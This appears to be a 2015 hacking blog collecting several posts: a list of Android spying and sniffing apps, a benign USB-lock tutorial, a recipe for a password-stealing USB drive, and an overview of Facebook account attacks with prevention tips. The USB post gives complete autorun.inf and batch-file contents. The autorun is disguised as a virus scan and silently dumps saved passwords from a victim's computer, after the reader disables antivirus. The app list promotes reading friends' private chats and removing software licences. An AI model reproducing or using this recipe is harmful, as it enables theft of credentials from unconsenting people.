Saturday, November 21, 2015

Here are top 10 popular hacking apps for Android smartphones and tablets ..

Hack using android phone?? Here are top 10 popular hacking apps for Android smartphones and tablets ..


top 10 hacking apk
Linux is regarded as the best operating system for ethical hacking and penetration testing. There are various hacking apps available for Android, as it is a Linux based operating system. If you want to test out vulnerabilities and find bugs, you need a solid hacking tool to back your research up.
Below is a list of Android hacking applications that will convert your Android device into a hacking machine.
AndroRAT
AndroRAT is a remote administration tool for Android devices. In other words, it is basically a client server application. The aim of the remote administration tool is to give control of the Android system remotely and retrieve information from it.
SpoofApp
(Phone call only) SpoofApp let’s you to place (spoof) calls with any caller ID number. You need SpoofCards to spoof calls, which are sold separately. It also includes some other features such as voice changer, which allows you to change your voice while using it. Additionally, it also allows you to record the whole conversation. You will receive a free 5 minute SpoofCard when you install the app for the first time.
Network Spoofer
Network Spoofer is another good app that allows you to change the website on other people’s computer from your Android phone. You need to download the Network Spoofer app and then log onto the Wi-Fi network. Choose a spoof to use with the app then tap on start. This app is considered as a malicious hacking tool by network administrators. So, it is advisable to not try this on unauthorized networks, as this is not a penetration testing app. It is just to exhibit how susceptible the home network is.
Faceniff
(Facebook only) Faceniff is basically used to sniff the Facebook ID over the same network. For instance, if you are on the same network and your Faceniff is turned on, then it will sniff all the Facebook IDs that are logged in from the same network. Since this is a paid version, you need to pay for this on the internet.
WhatsApp Sniffer
(For WhatsApp only) This tool can be used to hack private WhatsApp chats, pictures, audios and videos of your friends who are using your Wi-Fi Hotspot. Disable your antivirus before using this app, as it is detected by antivirus.
APK Inspector
The goal of this project is to aide analysts and reverse engineers to visualize compiled Android packages and their corresponding DEX code. APKInspector provides both analysis functions and graphic features for the users to gain deep insight into the malicious apps. You can also get the source code of any android application and edit it in order to remove credits and license.
dSploit
dSploit is a free penetration testing suite developed for the Android operating system, which comes with all-in-one network analysis capabilities. It can be used by anyone in order to perform a number of advanced network related tasks. It also contains a number of powerful functions that allow you to analyze, capture, and manipulate network transactions. You can scan networks for connected devices, identify the operating system, running services and open ports on each device, as well as check them for vulnerabilities. The app is designed to be very fast, handy and easy to use.
Wi-Fi Killer
This app allows you to block a person from using your Wi-Fi network. You can disable internet connection for any device that is present in your Wi-Fi network.
DroidSheep
DroidSheep is also one of the free best application for sniffing the sessions over the network. Similar to Faceniff, it not only sniffs the Facebook sessions but also other sessions.
Eviloperator
(Phone call only) This app connects two person automatically in a phone call, which makes them believe that they have called each other. The advantage of this app is that you can record and save the conversation.
Some of the apps given above may work only on rooted Android smartphones. We have given links for the App download, however download the app at your own risk. If you are not familiar with pentesting, theses apps will do you no good.

Tuesday, October 13, 2015

Here is How Lock and unlock your computer with a USB drive, secret-agent style With Predator,

Lock and unlock your computer with a USB drive, secret-agent style
With Predator,


You can turn your USB drive into a "key" that unlocks your computer when plugged in, and locks it when it's removed.
If you prevent access to your computer with just a password, you are missing out on an alternate (and more secure) way to lock down your computer.
Predator, a free Windows program, turns your USB drive into a key that locks your computer when it's removed. To unlock your computer, you'll have to plug the USB drive back in. (Talk about having secret-agent-style security.)
Anyone who attempts to access your computer without the USB flash drive will be hit with an epic "Access Denied" message. To get started.
Follow this guide:
Step 1: Download and install Predator(Google it).
Step 2: Once Predator launches, plug in your USB flash drive. None of the contents of the drive will be deleted or altered in any way, so feel free to use your primary thumbdrive.
When you insert the drive, a dialog box will appear asking you to create a password. Click OK to continue.
Step 3: In the Preferences window, take note of a few key settings. First, enter a secure, unique password in the "New password" field. If you lose your USB drive, you'll use it to unlock your computer.
If you'd like, you can check the Always Required box and you'll be asked to enter the password each time you use your thumbdrive to unlock your PC.
Finally, in the section under Flash Drives, ensure that the correct USB flash drive is selected. When you're done, click "Create key" and then OK.
Predator.
Step 4: Predator will exit. When it does, click the Predator icon in the taskbar to restart the program. A few seconds later, the icon will turn green, alerting you that Predator is running.
Every 30 seconds, Predator will check to see that your USB drive is plugged in. If it isn't, your computer will dim and lock down.
Here are some extra tips:
To pause Predator at any time select "Pause monitoring" from the taskbar menu.
If someone tried to access your PC while it was locked down, you'll see the activity log when you log back in. You can see the log at any time by clicking "View log" from the taskbar menu

Monday, October 12, 2015

HOW TO GET A SAVED PASSWORD FROM COMPUTER USING PEN DRIVES

HOW TO GET A SAVED PASSWORD FROM A VICTIM'S COMPUTER USING PEN DRIVES..


As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passwords from their stored places. Using these tools and an USB pen drive you can create your own root kit to capture
passwords from your friend’s college Computer.
We need the following tools to create our root kit:
MessenPass:
Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL
Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView:
Recovers the passwords of the following email programs: Outlook
Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook
2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape
Mail, Mozilla Thunderbird, Group Mail Free. Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, G-mail), if you use the associated programs of these accounts. IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0
Protected Storage PassView:
Recovers all passwords store  inside the Protected Storage, including the Auto Complete passwords of Internet Explorer, passwords of
Password-protected sites, MSN Explorer Passwords, and more…
PasswordFox:
Password Fox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name,
Password, User Name Field, Password Field, and the Signons file name.
Here is a step by step procedre to create the password toolkit:
NOTE: You must temporarily disable your antivirus before following these steps.
1:Download all the 5 tools, extract them and copy only the executables (.exe files)  into your USB Pendrive.
ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2:Create a new Notepad and write the following text into it:
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy theautorun.inf file onto your USB pendrive.
Create another Notepad and write the following text onto it:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
3:save the Notepad and rename it from New Text Document.txt to launch.bat Copy the launch.bat file also to your USB drive.
Now your root kit is ready and you are all set to capture the passwords. You can use this pendrive on your friend’s PC or on your college computer.
Just follow these steps
1:Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2:In the pop-up window, select the first option (Perform a Virus Scan).
Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
3:Remove the pendrive and you’ll see the stored passwords in the .TXT files
This works on Windows 2000, XP,Vista 7, Windows 8 ,Windows 8.1
and windows 10
NOTE: This procedure will only recover the stored passwords (if any) on the
Computer.This tutorial is only for educational purpose and do this at your own risk

Sunday, October 11, 2015

Here are some step to hack facebook account in 2016..

How to Hack Facebook Account 2016




Mostly Hackers use these methods to hack facebook:
facebook account 2016, So protect yourself from hackers. Must Read this post, and beware from hackers

1. Hack Facebook Account Password By ‪Phishing‬

Phishing is still the most popular attack vector used for hacking Facebook accounts. There are variety methods to carry out phishing attack. In a simple phishing attacks a hacker creates a
fake log in page which exactly looks like the real Facebook page and then asks the victim to log in. Once the victim log in through the fake page the, the victims “Email Address” and “Password” is stored in to a text file, and the hacker then downloads the text file and gets his hands on the victims credentials.

How to prevent:
  
Always check the page URL before logging in. This is the most trusted and effective way one can use to avoid himself from phishing.
Other way is to use some good Antivirus software which will warn you if you visit a harmful phishing page.
Even if somehow you have already entered your credentials in a phisher, Immediately Change your password.

2. Hack Facebook Account Password By ‪Keylogging‬

Keylogging is the easiest way to hack a Facebook password. Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A Keylogger is basically a small program which, once is installed on victim’s computer, will
record every thing victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address.

How to prevent :

Run the file only if you trust the sender.
Use good antivirus and update it regularly
 3. Social Engineering 
 

This method includes guessing and fooling the clients to give their own passwords. In this type of attack, a hacker sends a fake mail using most popular sites name.They convince that you have won billions of money and appeal for asking the user for user's password. Answering the security questions also lies under this category. It is not easy to convince someone to make him give his password.Guessing generally doesn't always work ( Although if you are lucky enough it may work!).


How to prevent:
 
Never give your password to anyone
Don’t believe in any sort of E-mails which asks for your password

4. Hack Facebook Account Password By ‪‎Session Hijacking‬

Session Hijacking can be often very dangerous if you are accessing Facebook on a http (non secure) connection. In Session Hijacking attack, a hacker steals the victims browser cookie which is used to authenticate the user on a website, and use it to access the victims
account. Session hijacking is widely used on LAN, and WiFi connections.

How to prevent:

Will not work if the user is using HTTPS ( Secured) connections

5. Trojan and Backdoor

This is an advanced level of hacking. It consists of a server and a client. In this type of attack the hacker sends the infected server to the victim. After execution the infected server i.e. Trojan on the victim’s PC opens a backdoor and now the hacker can control the  victim’s PC .

How to prevent:
  
Execute the file only if you trust the sende.
Use Best antivirus, therefore it detects Trojan horse virus too .

6. Sniffing

It consists of stealing session in progress. In this type of attack hacker makes connection with server and client and relays message between them, making them believe that they are talking to each other directly.Hackers choose many ways. 
Some drawbacks of this type of hacking is If user is logged out then attacker is also logged out and the session is lost.
It is difficult to sniff on SSL protected networks.

How to prevent:

Always use SSL secured connections.
Always keep a look at the url if the http:// is not changed to https:// it means that sniffing is active on your network.
Mostly hackers use these methods to hack facebook account password, We are shared this ways/post only for security purpose. We get numerous emails on a daily basis asking us to how to Hack friends Facebook or E-mail account If your email falls into any of the above categories we will not help you.